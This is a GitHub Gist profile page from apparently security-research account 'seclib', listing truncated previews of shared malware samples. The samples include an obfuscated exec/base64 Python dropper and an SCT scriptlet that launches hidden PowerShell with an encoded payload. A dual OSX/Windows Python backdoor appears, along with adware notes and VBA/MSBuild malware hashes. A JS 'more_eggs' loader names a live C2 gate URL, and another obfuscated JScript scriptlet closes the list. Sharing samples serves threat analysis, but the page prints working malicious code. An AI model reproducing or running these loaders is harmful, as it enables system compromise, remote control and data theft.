Skip to content

Instantly share code, notes, and snippets.

View seclib's full-sized avatar

Seclib seclib

25 followers · 4 following
View GitHub Profile
@seclib
seclib / 4d8e4c3902f46d941e5ae9d914126b
Created November 13, 2018 00:53
Python obfuscated sample
## Uploaded by @satya_enki
exec("import re;import base64");exec((lambda p,y:(lambda o,b,f:re.sub(o,b,f))(r"([0-9a-f]+)",lambda m:p(m,y),base64.b64decode("IyEvZjkvZmUvZDEKCmIgODAsMTMKYiAyNApiIDVkCmIgMWEsIDI1CmIgZgpiIGI4CmIgYWEKYTcgYWQgYiAxMDgsIGM1CmE3IDI1IGIgNDcsIGI0LCA3NApiIDMzCmIgOGUKYiBhNQpiIGFkCgo1MCA9ICI4ODovL2ZhLjU3LmZmIgozNSA9IDUwKyIvMTA5LTkzLzkzLWYxLmZjIgo1ZSA9IDM1ICsgIj83Nj05ZCYxMTU9Ni41LjEiCjQ5ID0gNTArIi80OS8iCgoxZCA9IDZhKDVkLjRmWzFdKQo3MSA9ICJjYy42ZS44MiIKYTQgPSA4MC43OCgnYmE6Ly9iNS85OC8lY2InICUgKDcxKSkKOTAgPSAzMy45MSgpCjVhID0gMzMuOTEoKS4zZQoxMDggPSA5MC4zZSgnMTA4JykKMjMgPSAxMDgrIi9lYy5jZCIKYjYgPSAxMDgrIi9mNC5jZCIKNWMgPSAxMDgrIi9kNS45YiIKYjEgPSAyNC43MCgpCgoKMTQgY2UoMTAzLCA1Nj0nJywgNGM9JycpOgoJNDMgNTY6IDY5ID0gMjUuNDcoMTAzLCA1NikKCThhOiA2OSA9IDI1LjQ3KDEwMykKCTY5LjUxKCdhMC05NCcsICc3Mi81LjAgKDczOyAxMTE7IDczIDExMiA1LjE7IGEyLTEwYjsgZTg6MS45LjAuMykgOTcvOTYgNmYvMy4wLjMnKQoJNDMgNGM6CgkgIDY5LjUxKCdiNycsIDRjKQoJNDIgPSAyNS43NCg2OSkKCTE4PTQyLmVkKCkKCTQyLmU2KCkKCWMgMTgKCQoxNCA2MCgxMDMsIDU1LCAyMyk6CgkzNiA9IDI0LjYzK
@seclib
seclib / vbscript
Created November 27, 2018 06:21
a killer feature of @gchq CyberChef
<?XML version="1.0"?>
<scriptlet>
<registration>
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcA
@seclib
seclib / WDATP APIs Demo Notebook
Created December 12, 2018 06:33
This file has been truncated, but you can view the full file.
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Dependencies \n",
"\n",
"To view the visualizations below, you may need to install holoviews:\n",
"\n",
@seclib
seclib / WDATP API
Created December 12, 2018 06:44
Dependencies
To view the visualizations below, you may need to install holoviews:
!pip install holoviews
!pip install --upgrade bokeh
When your app is registered to call the WDATP APIs you need to pass the credentials in to this sample.
@seclib
seclib / OSX Windows malware
Created January 4, 2019 18:37
All you need to analyze this dual OSX/Windows malware is a base64 decode utility and some #Python knowledge
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtabimport binascii
import code
import os
import platform
import random
import re
import select
import socket
@seclib
seclib / PowerShell example payloads on VT
Created January 4, 2019 18:40
Here are other hashes that the rule finds
## PowerShell example payloads on VT
0255345614907b1959b453ba7fbcea41c9eff616bdd6b0f588d488bd459ed0be
086b1c3bb877ea9f24564004156bd73a9a60639ef1fbd9e950e3e2183aeaa9c5
092346663482217f75c89afc2ed295acb68f3dcca586956e7516241a97c24f3b
1aef012e1cf317319aa043b288192440d7fee47b3529578eb7329f76bdd26697
1b33eac5b2e2345862cfb640ecae3ed2c8086cbbccb72eb6803f2506374fbad2
234d679a09ee0c8dff938c8a3435c47b158efc5e84b06326c499b7004674b55f
365c3cb4f905d182a655402b92018ef3335453e7de9239b111cd3410f44de6c0
520168111dc43c54be9aaa7ce80470547f7c0581c6275489670dfc9bf1c2343f
@seclib
seclib / adware
Last active January 4, 2019 18:47
It injects into Chrome, uses Google analytics for tracking, calls native Windows and COM APIs, and uses a scheduled task for persistence. Python sources and hashes
## uploaded by @satya_enki
## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
## links:
## https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
## https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
## Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
## https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/
## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):
@seclib
seclib / e6f5r65t9n87r9u7yr87u
Created February 5, 2019 12:25
VBA DOC Malware MSBuild Scheduled Task
##Uploader by satya_enki
## Sample evolution:
## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462
olevba3 0.53.1 - http://decalage.info/python/oletools
@seclib
seclib / JS Terra Loader aka more_eggs backdoor
Created March 5, 2019 09:47
malware install loader
var BV = "6.0";
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
var hit_each = 1;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var Rkey = "ZkY3egXBulkogSbGEHqA";
var rcon_now = 0;
var gtfo = false;
var selfdel = false;
@seclib
seclib / Scriptlet Decoded
Created March 5, 2019 09:59
Scriptlet Decoded
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHARy;var sDBrnzbZ4I = "";for(vpq8QW3uBI = 0;vpq8QW3uBI<fIImISnUlb.length-3;vpq8QW3uBI += 4){mRIs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+0));xYYT7RMqs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+1));hQtefhUl=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+2));tgHARy=xP0